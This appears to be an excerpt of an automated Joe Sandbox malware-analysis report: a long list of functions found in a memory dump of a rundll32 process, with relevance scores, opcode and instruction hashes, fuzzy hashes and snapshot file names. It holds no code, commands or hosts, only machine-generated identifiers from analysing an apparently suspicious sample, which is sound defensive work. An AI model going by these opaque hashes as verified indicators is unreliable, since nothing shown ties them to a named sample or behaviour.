                                                                                                                                                                                                                                                                                                • Opcode ID: 3af88b9966cb1e7fdd26dd1dc086a95b28eb440454335a974528a4eecdb12d6a
                                                                                                                                                                                                                                                                                                • Instruction ID: 6fa8d2507b5f50524c8a4c11d85e878555bc8cdc06dc186f43c1bd742e4212fe
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3af88b9966cb1e7fdd26dd1dc086a95b28eb440454335a974528a4eecdb12d6a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3117335B002159FDB449FA99845A6F7EBAF7C8600B118029F905D7340DE389D018BE1
                                                                                                                                                                                                                                                                                                Function 06F957B8 Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (oq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                • Opcode ID: 93226db37dad719b582efde331ba7916d7089a0d96b26ee53e9a109d3ff40630
                                                                                                                                                                                                                                                                                                • Instruction ID: 184d16ed3f587de2682312cf84d3ab120d805ebf0418b31f8225f85263a5d63a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93226db37dad719b582efde331ba7916d7089a0d96b26ee53e9a109d3ff40630
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A001F2313042454FEB56AB3DD85096E3FD79FCA21071844BAD04ACB7A1EE26EC4AC7A1
                                                                                                                                                                                                                                                                                                Function 06F9E3EB Relevance: 1.3, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: C8
                                                                                                                                                                                                                                                                                                • API String ID: 0-816706217
                                                                                                                                                                                                                                                                                                • Opcode ID: 844cd7a7a74a5e8b97d0796f0d8557c165ecd71139353842db8eb10ac8d60174
                                                                                                                                                                                                                                                                                                • Instruction ID: ecf29db1baf360df3c53de06f487795f640bc3f21c3c1a1823b551e907079544
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 844cd7a7a74a5e8b97d0796f0d8557c165ecd71139353842db8eb10ac8d60174
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B501D676B202114FEB14D6A8D84177E77A2EFC8620F158126D6015B344DB747D0687D0
                                                                                                                                                                                                                                                                                                Function 06F9E36A Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: C8
                                                                                                                                                                                                                                                                                                • API String ID: 0-816706217
                                                                                                                                                                                                                                                                                                • Opcode ID: 7c9a1f9b112ca865422de0e502cf9a549a122620537b20666ff446a3512ade31
                                                                                                                                                                                                                                                                                                • Instruction ID: 05aeaa60996681c621a8691c608b4c963f8e83cb9fb95d39aa04880aa81284e7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c9a1f9b112ca865422de0e502cf9a549a122620537b20666ff446a3512ade31
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FDF02876B203104FEB1496A8CC0177E77A3EFC8620F158526DA055B384DF74BC0687E0
                                                                                                                                                                                                                                                                                                Function 06F999A8 Relevance: .3, Instructions: 299COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: e10c153332d8066ad8f1cf721d08967c29165071ffac487bb5e24e8a31761514
                                                                                                                                                                                                                                                                                                • Instruction ID: da0d6532f9e3fbf055723dee5a72e692e89e83940817683af22f10f7f56d5dda
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e10c153332d8066ad8f1cf721d08967c29165071ffac487bb5e24e8a31761514
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9ED1F834E003598FDB55CFA8C984A9DBBF2FF89300F198199D848AB265DB74ED45CB60
                                                                                                                                                                                                                                                                                                Function 06F9BE40 Relevance: .3, Instructions: 273COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 3fa1a192cedbc5276c285cf27af7d46141253a455429b7f55ecbb4f74a59ca4b
                                                                                                                                                                                                                                                                                                • Instruction ID: cedb49aaa414c3c7646b99df43bd8ca3a79251ce9e75d5bf6e30592b693f21f3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3fa1a192cedbc5276c285cf27af7d46141253a455429b7f55ecbb4f74a59ca4b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6B18974B006058FDB55DF38D59496EBBF2FF89304B148669E8068B365DB38EC46CB90
                                                                                                                                                                                                                                                                                                Function 06F9BDC0 Relevance: .2, Instructions: 195COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: d3ee7406e21adb6e8ec2eb0ed101456a89380309c56ae6396f1d8c58ecd8d89a
                                                                                                                                                                                                                                                                                                • Instruction ID: e077e1b440e55164f5f640aabd1b18b1e98364d825b1d7e83c1ac1a834a2bca2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d3ee7406e21adb6e8ec2eb0ed101456a89380309c56ae6396f1d8c58ecd8d89a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C181AB74B002058FDB15DF38D98496EFBF2FF89204B048669E8468B3A5DB34EC45CBA0
                                                                                                                                                                                                                                                                                                Function 06F9BE33 Relevance: .2, Instructions: 193COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 864d52e5aaa4011fc08fdf507de6f694d9e99d85a4b2b8c2d3baf708638b417b
                                                                                                                                                                                                                                                                                                • Instruction ID: 4b27ae683fcbead830a05b186bb7fb03b5f908a4612889320142c9c9d4df4069
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 864d52e5aaa4011fc08fdf507de6f694d9e99d85a4b2b8c2d3baf708638b417b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0718B74B002058FDB15DF38D99496EFBF2FF89214B048669E8568B3A5DB34EC45CBA0
                                                                                                                                                                                                                                                                                                Function 06F9ABA0 Relevance: .2, Instructions: 186COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: e0d3ffb2dcbe99381591385610cac8bf44c6259a23cebc74e12302e425dd4724
                                                                                                                                                                                                                                                                                                • Instruction ID: 01c02e6c5f5cd40531d5421c395bbf9ae6400a70c6f880393b1bc71399554e37
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e0d3ffb2dcbe99381591385610cac8bf44c6259a23cebc74e12302e425dd4724
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D514575B405118FEB889F2EC49892A77E7AFC961132981AAE506CF375DF31DC01CBA0
                                                                                                                                                                                                                                                                                                Function 06F9E7D8 Relevance: .2, Instructions: 181COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 77c2f5906f1ad1ceb2e5c5f8d68a2d7397f8dfa93a01d8930d2ceeba7a60dcdf
                                                                                                                                                                                                                                                                                                • Instruction ID: 76cb5d3f4899edc2565ee05ff0cf0975382b848794b89069c3c099d2648a1a91
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77c2f5906f1ad1ceb2e5c5f8d68a2d7397f8dfa93a01d8930d2ceeba7a60dcdf
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9617D30B002158FEB58EFA9D59566EB7F6EFC8600B248429E406DB394DF75EC058BA1
                                                                                                                                                                                                                                                                                                Function 06F96C10 Relevance: .2, Instructions: 154COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 69cc3c7a5b18ca6094a2f7003b6fba019d88d055e727edb3691f852035c8dc06
                                                                                                                                                                                                                                                                                                • Instruction ID: b515c17f286da7b4bfcc91de18684eafa9d11fd792477af52bb6d83e35f203db
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69cc3c7a5b18ca6094a2f7003b6fba019d88d055e727edb3691f852035c8dc06
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2051CE70B002069FDB45DB68C944AAEBBF2FF88310B218169E855DB3A5DB30ED45CB90
                                                                                                                                                                                                                                                                                                Function 06F960D9 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ebeb56ee16d20ed2904da86f87671547d5f5bd505f5af47f4b0c8baa2b3cd2ad
                                                                                                                                                                                                                                                                                                • Instruction ID: d4d9ccff9f7c40c04f54d56bef987d219b1897a55f48d8e1ee67245008ea4720
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ebeb56ee16d20ed2904da86f87671547d5f5bd505f5af47f4b0c8baa2b3cd2ad
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35514D70E00208AFDB04EBE4C8A06DEBFB2EF89310F108129D516777A4CE356D55AB91
                                                                                                                                                                                                                                                                                                Function 06F95483 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 2822b5a266b58bf233ccf1f425508b615a77685608358a5d87bde278a3b01be1
                                                                                                                                                                                                                                                                                                • Instruction ID: 3c4ec957ab3be7dde1ac9c7f13a79ea6d1b6d9e13151a65c0d217d47343445d4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2822b5a266b58bf233ccf1f425508b615a77685608358a5d87bde278a3b01be1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4512974A00219EFDB04EBE8D8556AEBBB6EFC8300F104529E5117B3A4CE356D65CBA1
                                                                                                                                                                                                                                                                                                Function 06F934A8 Relevance: .1, Instructions: 141COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: fb9357aa94e7fdd0faa2ee7c3adb0595b0bceb61292b14b5b57b594b80da77e6
                                                                                                                                                                                                                                                                                                • Instruction ID: b6cdb1e9d3beecb322de478ff170532d55ccfd80972a810da2e31808f8945b5d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb9357aa94e7fdd0faa2ee7c3adb0595b0bceb61292b14b5b57b594b80da77e6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9851A1347001069FCB46EBB8DA9052EFBA7EFC52007119639D4099B369EF74ED4A8BD0
                                                                                                                                                                                                                                                                                                Function 06F934B8 Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 9339d8c0facf8a3e77ad789e9184bd7982da573abdf03ca32550e1143a89c05c
                                                                                                                                                                                                                                                                                                • Instruction ID: 48ec6d1bc08d2adb71c127ccdf80734ca1fbd2a7acb7c4b69fafa4d327a4a186
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9339d8c0facf8a3e77ad789e9184bd7982da573abdf03ca32550e1143a89c05c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD5191747101069FCB45EBB8D69066EFBA7EBC42007119639D4099B368EF74FD4A8BD0
                                                                                                                                                                                                                                                                                                Function 06F95490 Relevance: .1, Instructions: 136COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 1ff65c4908d1747fd83ad452ba94b11f9a5fc52ea3a98b3a387212de14007cc4
                                                                                                                                                                                                                                                                                                • Instruction ID: b4e971fe03bec3f9877ffb69192eb6e7a488bc03c8fcb2885932e77e9eb0e6c3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ff65c4908d1747fd83ad452ba94b11f9a5fc52ea3a98b3a387212de14007cc4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 49511A74A00219EFDB04EBE8D8556AEBBB2FFC8300F104528E5157B3A4CE356D65CBA1
                                                                                                                                                                                                                                                                                                Function 06F9B4F7 Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 9b4235eef999ba20401d9862de74b8a17d4f43af4949e9ef8ed3374cfaafa3d0
                                                                                                                                                                                                                                                                                                • Instruction ID: 5c7e139834009e08ab02b3db56582c8a5728e8aea8f49f75349f8b796b529a5e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9b4235eef999ba20401d9862de74b8a17d4f43af4949e9ef8ed3374cfaafa3d0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B541A17190E3D15FDB03AB38DC656967F71DF43210B0A41E7D480CF1A3DA68984AC7A6
                                                                                                                                                                                                                                                                                                Function 06F9E7C7 Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 757f18878d3b206332cd970ea8793484b634c2359760908d457cd1027088dca3
                                                                                                                                                                                                                                                                                                • Instruction ID: b2a8b7e8d854bed2f8246f1a147ce894181876f79157b7f7f31afac918bb4a5a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 757f18878d3b206332cd970ea8793484b634c2359760908d457cd1027088dca3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E419D31B002158FDF58EFB9D454AAEB7F6EFC8610B248429D412EB394DF75AC058BA1
                                                                                                                                                                                                                                                                                                Function 06F91F08 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: b94ce88640283d1bcb715d1e4955d094fd738370dc8f87c49e15c453f3602f8f
                                                                                                                                                                                                                                                                                                • Instruction ID: 7225ef716b742050ebf1c01c466abacc1baccd2ad6d05eea31414e2038aac371
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b94ce88640283d1bcb715d1e4955d094fd738370dc8f87c49e15c453f3602f8f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E316933B0924A7FDF2596B57C2166B7F6ACBC1258B04406BE608CF1E6DE289911C3F4
                                                                                                                                                                                                                                                                                                Function 06F9E1E0 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: cdfa9abc5350f6493f86efb1ee561dd87b06f8c6c4776515f0ebd6d64867c34b
                                                                                                                                                                                                                                                                                                • Instruction ID: ffc53792e1a824b9d8282ef10e61ba5e7f648e3a66469f5896835574dfac9e10
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cdfa9abc5350f6493f86efb1ee561dd87b06f8c6c4776515f0ebd6d64867c34b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58414C75E002599FDB54CFA9D98099EBBF2FF89310F258169E801AB364DB30ED46CB50
                                                                                                                                                                                                                                                                                                Function 06F92268 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: c7de23564dace63992c4dd1b8f4a6f1b2ae6ae543a672092e3ff06dc12b6dd14
                                                                                                                                                                                                                                                                                                • Instruction ID: f964d826a269997be2f7346c758a08fdd936f1bd839afe66c2fd278bc6f91ebc
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7de23564dace63992c4dd1b8f4a6f1b2ae6ae543a672092e3ff06dc12b6dd14
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A411835B101189FDB94DFB8D98499EBBB6FF88310B10816AE905EB364DB31DD41CBA0
                                                                                                                                                                                                                                                                                                Function 06F9C9A8 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 60bde08b87864defdaf4c4cb48e788980728262a9e9b87ce065b7fe33f781ecd
                                                                                                                                                                                                                                                                                                • Instruction ID: c7ccafaade75b72e5696c62d586eb68437fb9dd12ae069b8bfc0750420e0f41c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 60bde08b87864defdaf4c4cb48e788980728262a9e9b87ce065b7fe33f781ecd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA316D9285E7E01FEB03AB3CA9710DA7F719D5322470A41D7C0D1CE0B7E5498A8DC3AA
                                                                                                                                                                                                                                                                                                Function 06F9F699 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: c4e89276fc507672079265d6741405d9ffb32ea6bd9124e1b3cf329f93b361e8
                                                                                                                                                                                                                                                                                                • Instruction ID: e14742315fa16aad4bd669fc6dac8cf90c6964aa74c66f9d733f07e06cbdda2d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4e89276fc507672079265d6741405d9ffb32ea6bd9124e1b3cf329f93b361e8
